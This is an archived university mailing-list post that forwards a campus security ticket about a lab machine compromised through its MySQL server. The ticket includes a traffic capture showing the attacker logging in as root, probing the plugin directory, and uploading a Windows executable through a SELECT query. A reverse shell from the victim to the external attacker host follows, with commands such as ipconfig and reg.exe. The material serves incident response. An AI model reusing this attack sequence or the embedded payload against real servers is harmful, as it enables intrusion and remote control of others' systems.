[4eyes] [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server

Matthew Turk mturk at cs.ucsb.edu
Thu Jan 19 17:58:48 PST 2017


No one has claimed this machine yet. Please check yours and let me know. (There are usual suspects here, but I won't name names!)

	Matthew

-----Original Message-----
From: Matthew Turk [mailto:mturk21 at gmail.com] On Behalf Of Matthew Turk
Sent: Wednesday, January 18, 2017 9:20 PM
To: ilab-users at lists.cs.ucsb.edu
Subject: FW: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server

Whose machine is 128.111.28.118? Please check - if it's yours, please let me know and see the info below.

Thanks,
	Matthew

-----Original Message-----
From: Tier II Support Issues via CoE Support [mailto:help at engineering.ucsb.edu]
Sent: Wednesday, January 18, 2017 10:41 AM
To: holl at cs.ucsb.edu; mturk at cs.ucsb.edu
Subject: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server

The following reply has been made regarding CoE Support ticket #74336:

Hi Matt and Tobias,

OIT has sent us this warning about the ilab-118 machine, which is compromised and needs to be looked into. Please read the information below.

On Wed Jan 18 10:24:26 2017, security at ucsb.edu wrote:
> Greetings,
>
> 128.111.28.118 has been compromised and has been blocked. The host was 
> compromised via its MySQL server.
>
> Before correcting any problems, please consider whether any sensitive 
> personal information is stored on this device. If this device contains 
> personal information and if it appears to have been compromised, 
> please contact the UCSB Chief Information Security Officer, at 
> CISO at oist.ucsb.edu or 893-5005 immediately.
>
> To view the UCSB procedures when a device storing personal information 
> has been compromised, please visit:
> http://www.ets.ucsb.edu/security/sb-1386-and-ab-1298-guideline
>
> Please investigate and advise. Here is a sample of traffic from the
> trojan:
>
> ----------sample----------
> T 2017/01/18 02:45:47.091988 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
> ......
>
> T 2017/01/18 02:45:47.497391 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
> J...
> 5.5.11..+..EV``AdUY...!...............B~tMc*DXpHVW.mysql_native_password.
>
> T 2017/01/18 02:45:47.684113 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
>
> V.......... at ........................root......Ndy....3......;.mysql.mysql_native_password.
>
> T 2017/01/18 02:45:47.684972 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
> ...........
>
> T 2017/01/18 02:45:47.878832 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
> .....SELECT @@max_allowed_packet;
>
> T 2017/01/18 02:45:47.899132 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
>
> .....*....def....@@max_allowed_packet..?.........................1048576.........
>
> T 2017/01/18 02:45:48.088029 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
> .....SHOW VARIABLES LIKE 'VERS%';
>
> T 2017/01/18 02:45:48.287569 128.111.28.118:3306 ->
> 188.132.176.26:3549 [A]
> ......
>
> T 2017/01/18 02:45:48.331489 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
>
> .....T....def.information_schema.VARIABLES.VARIABLES.Variable_name.VARIABLE_NAME... at .........M....def.information_schema.VARIABLES.VARIABLES.Value.VARIABLE_VALUE...................."......version.5.5.11-
> ....version_comment.MySQL Community Server 
> (GPL).....version_compile_machine.x86.....version_compile_os.Win64.......".
>
> T 2017/01/18 02:45:48.682703 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
> ......
>
> T 2017/01/18 02:45:50.427705 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
>
> ....USE MYSQL
>
> T 2017/01/18 02:45:50.428403 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
> ...........
>
> T 2017/01/18 02:45:50.613848 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
> .....SELECT @@version_compile_os;
>
> T 2017/01/18 02:45:50.614481 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
>
> .....*....def....@@version_compile_os............................Win64.........
>
> T 2017/01/18 02:45:50.800022 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
> .....SELECT @@plugin_dir;
>
> T 2017/01/18 02:45:50.800759 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
> ....."....def....@@plugin_dir....2..................3...2C:\Program
> Files\MySQL\MySQL Server 5.5\lib/plugin.........
>
> T 2017/01/18 02:45:50.990204 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
> .l...SELECT
>
'MZ.\0.\0\0\0.\0\0\0..\0\0.\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.\0\0\0....\0...!..L.!This
> program cannot be run in DOS
>
mode.\r\r\n$\0\0\0\0\0\0\0....[...[...[...R.\".G...R.%.3...R.5.\\...[...1...R.3.P...R./.Z...R.4.Z...R.7.Z...Rich[...\0\0\0\0\0\0\0\0PE\0\0d..\0?..M\0\0\0\0\0\0\0\0.\0\"
>
...\0\0.\0\0\0V\0\0\0\0\0\0D.\0\0\0.\0\0\0\0\0..\0\0\0\0.\0\0\0.\0\0.\0.\0\0\0\0\0.\0.\0\0\0\0\0\0..\0\0.\0\0...\0.\0\0\0\0\0.\0\0\0\0\0\0.\0\0\0\0\0\0\0\0.\0\0\0\0\0\0.\0\0\0\0\0\0\0\0\0\0.\0\0\0...\0..\0\0...\0P\0\0\0\0`.\0..\0\0\0P.\0..\0\0\0\0\0\0\0\0\0\0\0p.\0..\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.text\0\0\0p.\0\0\0.\0\0\0.\0\0\0.\0\0\0\0\0\0\0\0\0\0\0\0\0\0
>
\0\0`.rdata\0\0..\0\0\0.\0\0\00\0\0\0.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0 at .data\0\0\0.5\0\0\0..\0\0.\0\0\0.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0..pdata\0\0!
>
..\0\0\0P.\0\0\n\0\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0 at .rsrc\0\0\0..\0\0\0`.\0\0.\0\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0 at .reloc\0\0..\0\0\0p.\0\0.\0\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0B\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
>
> T 2017/01/18 02:45:50.990462 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
>
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.:\0tPH..D.\0\0I.\0H..B.\0\0I. at .H..?.\0\0I. at .H..<.\0\0I. at .H..9.\0\0I.@
>
H..6.\0\0I.@(...3.\0\0fA. at 0...2..........H..!.\0\0I.\0H....\0\0I. at .H....\0\0I. at ...\Z.\0\0A. at ......\0\0fA. at ......\0\0A. at .A...\0\0\0I........:.u.H.B..8\0u....2..H....\0\0I.\0H....\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
> .....\0\0fA.@(.....\0\0A.@*................\0\0............. at SH..
> H.J.I..H.....\0\0L..H..u.H.L$P...H..
> [.H.|$03.H...I....H.|$0I..H..H....H.. [................H.\\$.WH..
>
.:.I..H..tUH.\rT...H....\0\0I.\0H....\0\0I. at .H....\0\0I. at .....\0\0A. at ......\0\0fA. at ......\0\0A. at ...H.\\$0H..
>
_.H.B..8\0tJH.\r....H....\0\0I.\0H..\0.\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
> ..H.\\$0H.. _.. at .\0\0\!
> 0\0H.B..H..\0.L.....\0\0H.G.H..u?H.\r....H..
> .\0\0H..H..(.\0\0H.C.H..0.\0\0H.C....8.\0\0f.C...H.\\$0H..
> _.2.H.\\$0H..
> _......H..(H.I.H..t..^.\0\0H..(..........H.\\$.H.t$.WH..
>
H.B.H.q.H..H.R.D.\0H..H..I.\\0....\0\0L._.H..A....0\0H.G.H.W.D. at .H.R..\\.\0\0L._.H..A.C.H.....\0....\0\0H.\\$0H.t$8H.H..
>
_...H..(H.J.H.....\0\0H.H..(...........:.u.H.B..8\0u.2..H....\0\0I.\0H....\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
> .....\0\0fA.@(.....\0\0A.@*..................H.t$ WATA
>
> T 2017/01/18 02:45:50.990557 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
> VH.. .\0.\0\0H.l$HM..L.l$PH...`.\0\0..\0\0\0L...S.\0\0E3.H..\r.\0\0D.
>
H.O.H..H.....\0\0A.T$.I..L..H...p.\0\0H..tYH.\\$@f.H...3.I....H..B.\\!.H.y.H.....#.\0\0A..D..H..I..H.....\0\0L....\0\0\0I..D.....\0\0H..u.H.\\$@H....\r\0\0.>\0L.l$PH.l$Ht/H...A.D$.H....0\03...H..H..H..A..H.t$XH..
> A^A\\_.H.D$`.\0.H..H.t$XH..
>
A^A\\_...............H.\\$.H.t$.WH..0H.z.H...3.H.?H..D.H at ..A.\0.\0\0H..H..H.y.3.....\0\0H.V.L..H..H..H.....\0\0H.T$HL..B\0\0\0H.T$(L..3.3..D$
>
\0\0\0\0....\0\0...H......\0\0H.\\$@H.t$P3.H..0_...........H..(.\'.\0\0.\03.H..(............... at UVATH....\0\0H..\r.\0\0H3.H..$..\0\0H.....H.L$xD.EaE3.3.D.d$p.d(\0\03.H.D$XH.D$`L.d$PH......\0\0H..$..\0\0H..$..\0\0L..$..\0\0A..\0\0\0H..$.\0\0\0A....k.\0\0.^...>H.....\0\0.U.D.E.E3.A..D.d$(D.d$
>
..h.\0\0...H..3.H..$.\0\0\0fD..$.\0\0\0..$.\0\0\0H..$.\0\0\0..\".\0\0D.E.H..$.\0\0\0H..f..$.\0\0\0....\0\0H..$..\0\0H..$..\0\0.....\0\0\0H.L$p..:.\0\0H..$..\0\0H.\r3.\0\0A...\0\0.D$ph\0\0\0..$.\0\0\0..\0\0fD..$.\0\0\0H..$.\0\0\0H..$.\0\0\0H..$.!
>
\0\0\0....\0\0....x\0\0\0H.D$PH..$..\0\0E3.H.D$HH.D$pE3.H.D$@L.d$8L.d$03..D$(.\0\0\0.D$
>
.\0\0\0....\0\0..t0A..H.L$P...\0\0....\0\0=..\0\0t.H.L$P..~.\0\0H.L$X..s.\0\0A..H......\0\0H......\0\0L..$..\0\0..H..$..\0\0H3....\0\0H....\0\0A\\^]..........:.u.H.B..8\0u..x.\0u.2..H..\Z.\0\0I.\0H....\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
>
.....\0\0fA.@(.......H.\\$.WH..0..\0\0\0H....\n\0\0H..H..tUH.O.H....<.\0\0.C.H.O.H.I....\0\0L..-
> ...L..f..3.3.H.D$(3..D$ ..z.\0\0H....i.
>
> T 2017/01/18 02:45:50.990690 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
>
\0\03.H.\\$@H..0_.H..\0\0\0\0\0\0\0H.\\$@H..0_........2...............H.\\$.WH..PH.D$0....3..D$8.\0\0\0.D$D.\0\0\0..5.\0\0L.D$0.W(H......\0\0.....\0\0\0L.D$<H....\0\03.....\0\0....tHH.L$0L.D$8E3.3.H.|$(H.|$
> ....\0\0....t#D.O.E3.3.3..D$
>
.\0\0\0..d.\0\0....t.\0\0..H.L$0....\0\0..[.\0\0t...t\r3.H.\\$`H..P_.H..\0\0\0\0\0\0\0H.\\$`H..P_..UH..H.E...............ff...\0\0\0\0\0H;\r..\0\0u.H...f....u...H....U.\0\0.H..t7SH..
> L..H.\r...\03...L.\0\0..u....\0\0H......\0\0...k.\0\0..H..
>
[....H..(L...\n.\0D...\n.\0M..I..I...M..M;.s.H9\nt.H...I;.r.I;.s.H...VH..uOA. at .A;.rF..H.........H;.s5D.A.I...e.\0\0L..H..t!.\r[\n.\0H..\\\n.\0H..H...I.....\rB\n.\0..3.H..(..H..H.X.H.H.VWATAUAVH..0.\0\0L..3.L..H.\\$h.X..X..X\Z.\\$`..H;....;.u&...\0\0.\0.\0\0\0H.\\$
> E3.E3.3.3....\0\03....\0\0..H;....;.u&...\0\0.\0.\0\0\0H.\\$
> E3.E3.3.3....\0\03....\0\0.
> 8\nu...\0\0\0H..8\nt.....\0\0\0..<wt*<rt&.P.\0\0.\0.\0\0\0H.\\$
>
E3.E3.3.3..Z.\0\03....\0\0..$p.\0\0H..8\nu.H..8\nt...:.t.<tt*<bt&...\0\0.\0.\0\0\0H.\\$
> E3.E3!
>
.3.3....\0\03..:.\0\0..$q.\0\0<tu.A.\0@\0\0..D...\0.\0\0<bD.D.A.....\0.\0\0H.L$X..*\0\0.......\0\0..$p.\0\0wu...D....$x.\0\0.t$P....D....$x.\0\0.\\$P..\0\0\0..\Z\0\0;.u..L$X.Y)\0\0.L$\\.P)\0\03....\0\0..\0\0\0...\0\0..t$t.t$p....\0\0Ic.HcL.XH..H...L...&.\0...Hk.XI....D$0.\0\0\0.t$(.d$
>
\0L..$.\0\0\0L..H..\nH....z.\0\0......\0\0.L.X..(\0\0.d.p\0HcD$PH..$p.\0\0.L.X.\Z\"\0\0L..H..$.\0\0\0H......\0\03......H..$.\0\0\0H......\0\0L....\0\03.H.L$h.+\r\0\0....t\Z...u.H.d$
> \0E
>
> T 2017/01/18 02:45:50.990877 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
> 3.E3.3.3..c.\0\0..u\nL.l$hM..u.L.-..\0\0.h\0\0\0L..3.H..$.\0\0\0..
>
\0\0..$.\0\0\0..$.\0\0\0\0.\0\0..u.H..$.\0\0\0H..H.\r.%.\0..H.\r.%.\0H..H..$.\0\0\0H..$..\0\0;.t.H.AXH..$..\0\0H...\0\0\0H..$
>
.\0\0I...x.\0\0H..I...m.\0\0H..H.\r..\0\0.^.\0\0H.\\..H..H.....\0\0L..3.H;.....\0\0M..H..H.....\0\0;.t.H.|$
> E3.E3.3.3..n.\0\0L....\0\0H..I.....\0\0;.t.H.|$
> E3.E3.3.3..D.\0\0L..$`.\0\0H..I.....\0\0;.t.H.|$
>
E3.E3.3.3....\0\0...\0\0....$`.\0\03.I...\r.\0\0;.uEH..$.\0\0\0H.D$HH..$.\0\0\0H.D$@H.|$8H.|$0.|$(.t$
> E3.E3.I..I......\0\0...D.\0\0H.|$xH.....\0\0...\0\0H..H..u-
>
3......I.......H.L$h........\0\0..D..$x.\0\0.l.\0\0L....\0\03.H.L$x...\0\0....t\Z...u.H.d$
>
\0E3.E3.3.3..>.\0\0..t?H.L$x.L...H...D...I...<...H.L$h.2......\0\0..$`.\0\0..D..$x.\0\0...\0\0H.L$x3.A...\0\0H...6.\0\0H..$.\0\0\0H;...<.\0\08.....\0\0H...q.\0\0H.\\8..;\\uA.\\\0\0\0H....\Z\0\0H;.taL....\0\0...\0\0H...1.\0\0..tIH.d$
> \0E3.E3.3.3..|.\0\0.2.;/t-L....\0\0...\0\0H.....\0\0..t.H.d$
> \0E3.E3.3.3..H.\0\0I.....\0\0H..H.....\0\0H..!
> ...\0\0H;....\0\0\0M..H..H.....\0\03.;.t.H.\\$
>
E3.E3.3.3....\0\03.H....\Z\0\0;.uBH..$.\0\0\0H.D$HH..$.\0\0\0H.D$@H.\\$8H.\\$0.\\$(.t$
>
E3.E3.I..H......\0\0....H..$.\0\0\0......t$`.\n.t$`...t$`H.L$x.....H.........$`.\0\03.I.......H.L$h.~...H..$.\0\0\0....\0\0H..$.\0\0\0..r.\0\0.E.\0\0..;.t.H..$.\0\0\0H..$.\0\0\0H.A.L.1.mH..$.\0\0\0H.9D..$x.\0\0..D..$x.\0\0I...1.\0\0Hc|$P.d.p\0E3.L..$.\0\0\0.\n.|$P...|$PIc..|.p\0t..L.X..#\0\0Hc..|.p\0t\n.L.X..#\0\0...\0\0\0...\0\0I..H..
>
> T 2017/01/18 02:45:50.990879 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
>
$h.\0\0H..0.\0\0A^A]A\\_^.H.t$.H.|$.ATH..0L..H...3.H.......u\'.l\r\0\0.\0.\0\0\0H.d$
>
\0E3.E3.3.3..u.\0\0....\0\0\0..\0\0\0...\0\0..u.....\0\0\0..\0\0\0...\0\0.I...z...H..H..u\r..\r\0\0.\0.\0\0\0.PI...5.\0\0.\0\r\0\0D.
> ...\0\0.
> \0A..\0\0\0H.V.H.L$@.9\'\0\0H;.u\n...\0\0.8.u..|$@...\0\0D.
> H.&\0H.f.\0..\0\0\0...\0\0..H.t$HH.|$PH..0A\\.H.\\$.H.t$.WH..
> H..H...w|..\0\0\0H..H.E.H.\r=..\0H..u .k-
>
\0\0..\0\0\0.9+\0\0..\0\0\0..\'\0\0H.\r...\0L..3.....\0\0H..H..u,9....\0t.H...y-
> \0\0..t\r...\".\0\0.\0.\0\0\0...\0\0.\0.\0\0\0H.....S-
> \0\0...\0\0.\0.\0\0\03.H.\\$0H.t$8H..
>
_...3.D.B\n../\0\0.H.\\$.WH..PH..L....\0\0H.L$`3.3.H.\\$`.Y.\0\0;.t....u.E3.E3.3.3.H.\\$
>
...\0\0H.L$`H.L$0H;.u\ZH;....\0\0\03....\0\0;......\0\0\0H....\0\0H.|$@H.\\$HH.D$8H;.tM.O.\0\0.8.H.\0\0L.D$0..H.T$0E3.3...3\0\0.....t..&.\0\0.8.8...\0\0.8.t\n...\0\0.8\ru$...\0\0.8H..p.\0\0L.D$0E3.3.H.T$0.
> /\0\0..H.L$`.......H.\\$hH..P_.....
>
> T 2017/01/18 02:45:50.991064 128.111.28.118:3306 ->
> 188.132.176.26:3549 [A]
> ......
>
> T 2017/01/18 02:45:50.991120 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
>
.............ff...\0\0\0\0\0L..M..t$H+....t(..........\0\0\0H..I..t....u...I...H...H...H..I...r&I........~L..L..I...M3.I.\0.......M..t.I......\0\0\0........\0\0\0H..I..tx...$.tuH..I..tiH........tbH..I..tV...$.tSH..I..tGH........t at H..I..t4...$.t1H..I..t%........t.H..I..t....$.t.H..I....<...I...H..H3.I...rE...t\nH....I....I..
> r.H..H.Q.H.Q.H.Q.H.. I.. s.I..
>
I...r.H..H.....I...I...r...H....I..... at SVWATAUH..@I....L..L..H..H..u*..t&.,.\0\0.\0.\0\0\0H!t$
> E3.E3.3.3..6.\0\03....\0\03........u\'...\0\0.\0.\0\0\0H.d$
> \0E3.E3.3.3....\0\03..Y.\0\03.H.......u\'...\0\0.\0.\0\0\0H.d$
>
\0E3.E3.3.3...\n\0\03..&.\0\0..u.3....\0\0H..$.\0\0\0H....3\0\0..C. at ...\0\0\0H...P6\0\0...t*...t%Hc.H..H...L.....\0...Hk.XI...H.\r..\0\0..H.\r..\0\0H..L.....\0.B8.u%...t\Z...t.Hc.H..H......Hk.XI....A8.t\'...\0\0.\0.\0\0\0H.d$
>
\0E3.E3.3.3...\n\0\03.H.t$0H..tV....|$xtH.C..x.H.....H..H...\nH...84\0\0...L$p...u.M;.u.3.H.t$0..A..$I..L.d$8..\nt...A..$\0H....3\0\0H..H.. at A]A\\_^[.H.\\$.H.t$.WH..
> H..H..H..u\nH........jH!
>
..u..^....\\H...wCH.\r...\0..\0\0\0H..H.D.L..3.L......\0\0H..H..uo9....\0tPH...Q(\0\0..t+H...v.H...?(\0\0...\0\0.\0.\0\0\03.H.\\$0H.t$8H..
>
_....\0\0H......\0\0...y.\0\0.......\0\0H......\0\0...`.\0\0..H.....H.\\$.H.t$.WH..
>
.=...\0\0H.....\0H..tmH..u.H9....\0t_..5\0\0..uVH.....\0H..tJH..tEH.....\0\0H..H..H..t2...\0\0H;.v.H...<9=u.L..H...E5\0\0..t.H.....H..H.D8...3.H.\\$0H.t$8H..
> _.... at SH..0H..3.H.......u$...\0\0.\0.\0\0\0H.d$
> \0E3.E3.3.3....\0\03..`...\0\0..6\0\03.H=.
>
> T 2017/01/18 02:45:50.991124 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
> .\0\0.....u$...\0\0.\0.\0\0\0H.d$
>
\0E3.E3.3.3....\0\03..#..\0\0\0..\r\0\0.H.......H....\0\0\0...\0\0H..H..0[..H.\\$.H.t$.H.|$.ATH..0I..H..H....\0\0\0..\r\0\0.3.H.......u&.\".\0\0..\0\0\0..H.d$
> \0E3.E3.3.3..*.\0\0..\0\0\0H.\'\0H..t.H.#\03.H.......u#...\0\0..\0\0\0
> ..H.d$
>
\0E3.E3.3.3....\0\0.zH.......H..H..u.3..fH...Q.\0\0..\0\0\0L.$.I....4\0\0H..H..u....\0\0.\0.\0\0\0...\0\0...1L..I..H.....\0\0..t.H.d$
> \0E3.E3.3.3..Q.\0\0H..t.L.#3...\0\0\0...\0\0..H.\\$@H.t$HH.|$PH..0A\\.. at SH..
>
I.....u......\0\0..u.3....\0\0..7\0\0..u....\0\0....=\0\0....\0\0H.....\0..;\0\0H..\Z.\0\0...\0\0..y..h4\0\0....:\0\0..x...7\0\0..x.3....\0\0..u.....\0\0..\0\0\0.i.\0\0....u9....\0\0....z.........\0\09..\0.\0u...!\0\0H..ux.6.\0\0..4\0\0.4.\0\0.g...uV..3\0\0...\0\0..\0\0\0.].\0\0H..H....*....\r..\0\0H......\0\0H....t.3...3\0\0....\0\0H.K.......
> ...........u.3..O6\0\0..\0\0\0H..
>
[.H.\\$.H.t$.H.|$.ATH..0I....L....\0\0\0..u.9...\0\0u.3...\0\0\0...t....u0L.\r&.\0\0M..t.A...D$
> ..t.L....I...a....D$ .....\0\0\0!
> L....I....>\0\0...D$
>
...u5..u1L..3.I....>\0\0L..3.I.......L....\0\0M..t.L..3.I..A....t....u7L....I...........#....L$
> t.H....\0\0H..t.L....I.......D$
> ....3.H.\\$@H.t$HH.|$PH..0A\\.H.\\$.H.t$.WH..
> I....H.....u...=\0\0L....H..H.\\$0H.t$8H..
>
_........H.L$.H...\0\0\0H.\ry.\0\0..c.\0\0L..d.\0\0L.\\$XE3.H.T$`H.L$X.K.\0\0H.D$PH.|$P\0tAH.D$8\0\0\0\0H.D$HH.D$0H.D$@H.D$(H..$.\0\0H.D$
>
L.L$PL.D$XH.T$`3....\0\0.\"H..$.\0\0\0H....\0\0H..$.\0\0\0H...H..}.\0\0H....\0\0H..G.\0\0H..$.\
>
> T 2017/01/18 02:45:50.991425 128.111.28.118:3306 ->
> 188.132.176.26:3549 [A]
> ......
>
> T 2017/01/18 02:45:50.991744 128.111.28.118:3306 ->
> 188.132.176.26:3549 [A]
> ......
>
> T 2017/01/18 02:45:51.015642 128.111.28.118:3306 ->
> 188.132.176.26:3549 [A]
> ......
>
> T 2017/01/18 02:45:51.176555 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
>
0\0\0H..H.\0\0....\0\0..\0.....\0\0.\0\0\0H....\0\0H.D$hH....\0\0H.D$p..n.\0\0....\0\0..\0\0\0.v=\0\03...N.\0\0H.\r..\0\0..9.\0\0.=b.\0\0\0u\n..\0\0\0.N=\0\0....\0\0...\0.H....\n.\0\0H...\0\0\0...L.\r9.\0\03.I..D. at .;\nt+..I....-
>
r..A....w..\r\0\0\0...D.....\0\0\0...A.F..H.A.D....H..(.o1\0\0H..u.H..K.\0\0..H...H..(.H..(.O1\0\0H..u.H../.\0\0..H...H..(. at SH..
> ...+1\0\0H..u.H....\0\0..H.......1\0\0L....\0\0H..t.L.P....;...A..H..
>
[....L$.H..(E3..\0.\0\03...X.\0\0H..!.\0\0H..t#L.D$0A..\0\0\03.H...D$0.\0\0\0..&.\0\0..\0\0\0H..(.H..(H.\r..\0\0....\0\0H.%..\0\0\0H..(...H.\r..\0\0. at SH....\0\0.d$p\0H.L$t3.A..\0\0\0.L\r\0\0L.\\$pH..$..\0\0H..$..\0\0L.\\$HH.D$P....\0\0H..$..\0\0H.T$@H..E3....\0\0H..t;H.d$8\0H.T$@H.L$`H.L$0H.L$XL..H.L$(H..$..\0\0L..H.L$
> 3..Q.\0\0.
>
H..$..\0\0H..$..\0\0H..$..\0\0H..$..\0\0H..$..\0\0.D$p..\0..D$t.\0\0\0H..$.\0\0\0....\0\03.......\0\0H.L$H....\0\0..u...u..H...:\0\0..N.\0\0...\0.H......\0\0H....\0\0[....H.\\$.H.l$.H.t$.WH..0H..H.\r..\0\0A..I..H... at .\0\0H..t\ZL.T!
> $`D..L..H..H..L.T$ ...%..\0\0\0.o:\0\0L.\\$`D..L..H..H..L.\\$
> .h...H.\\$@H.l$HH.t$PH..0_....H.\\$.H.l$.H.t$.WH..
> 3.H.....H.......H..H..u(9...\0\0v ....
> .\0\0D....\0\0D;...\0\0A...G.;.u.H.l$8H.t$@H..H.\\$0H..
> _.H..H.X.H.h.H.p.H.x ATH..
>
3.H..H..A...E3.H..H....9\0\0H..H..u*9...\0\0v\"......\0\0D....\0\0D;.g.\0\0A..A.G.A;.u.H.l$8H.t$@H.|$HH..H.\\$0H..
> A\\..H..H.X.H.h.H.p.H.x ATH..
>
3.H..H..A...H..H.......H..H..u/H..t*9...\0\0v\"......\0\0D....\0\0D;...\0\0A..A.G.A;.u.H.l$
>
> T 2017/01/18 02:45:54.767136 128.111.28.118:20138 ->
> 188.132.176.26:4000 [A]
> ......
>
> T 2017/01/18 02:45:55.049876 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> Microsoft Windows [Version 6.1.7601]
>
> T 2017/01/18 02:45:55.448211 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:45:55.448772 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> .
> Copyright (c) 2009 Microsoft Corporation. All rights reserved..
> .
> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>
> T 2017/01/18 02:45:55.776319 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:19.130812 188.132.176.26:4000 ->
> 128.111.28.118:20138 [AP]
> ipconfig
>
>
> T 2017/01/18 02:46:19.131472 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> ipconfig
>
>
> T 2017/01/18 02:46:19.304083 128.111.28.118:20138 ->
> 188.132.176.26:4000 [A]
> .
> Windows IP Configuration.
> .
> .
> Ethernet adapter Local Area Connection:.
> .
> Connection-specific DNS Suffix . : cs.ucsb.edu.
> IPv4 Address. . . . . . . . . . . : 128.111.28.118.
> Subnet Mask . . . . . . . . . . . : 255.255.255.192.
> Default Gateway . . . . . . . . . : 128.111.28.65.
> .
> Ethernet adapter Local Area Connection 2:.
> .
> Connection-specific DNS Suffix . : .
> IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4::1.
> Link-local IPv6 Address . . . . . : fe80::b57a:afce:a5c3:9380%15.
> IPv4 Address. . . . . . . . . . . : 10.37.130.2.
> Subnet Mask . . . . . . . . . . . : 255.255.255.0.
> Default Gateway . . . . . . . . . : .
> .
> Ethernet adapter Local Area Connection 2:.
> .
> Connection-specific DNS Suffix . : .
> IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:1::1.
> Link-local IPv6 Address . . . . . : fe80::c9a9:464b:1f35:e7b3%17.
> IPv4 Address. . . . . . . . . . . : 10.37.131.2.
> Subnet Mask . . . . . . . . . . . : 255.255.255.0.
> Default Gateway . . . . . . . . . : .
> .
> Tunnel adapter isatap.cs.ucsb.edu:.
> .
> Media State . . . . . . . . . . . : Media disconnected.
> Connection-specific DNS Suffix . : cs.ucsb.edu.
> .
> Tunnel adapter isatap.{49BB9C41-C060-433B-BF91-9F104E841F11}:.
> .
> Media State . . . . . . . . . . . : Media disconnected.
> Connection-specific DNS Suffix . : .
> .
> Tunnel adapter Local Area Connection* 11:.
> .
> Media State . . . . . . . . . . . : Media disconnected.
> Connection-spec
>
> T 2017/01/18 02:46:19.304089 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> ific DNS Suffix . : .
>
>
> T 2017/01/18 02:46:19.500202 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:19.500764 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> .
> Tunnel adapter isatap.{EB59D303-0C84-4EF4-842B-01A57D775715}:.
> .
> Media State . . . . . . . . . . . : Media disconnected.
> Connection-specific DNS Suffix . : .
> .
> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>
> T 2017/01/18 02:46:19.696722 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:44.733187 188.132.176.26:4000 ->
> 128.111.28.118:20138 [AP]
> reg.exe ADD
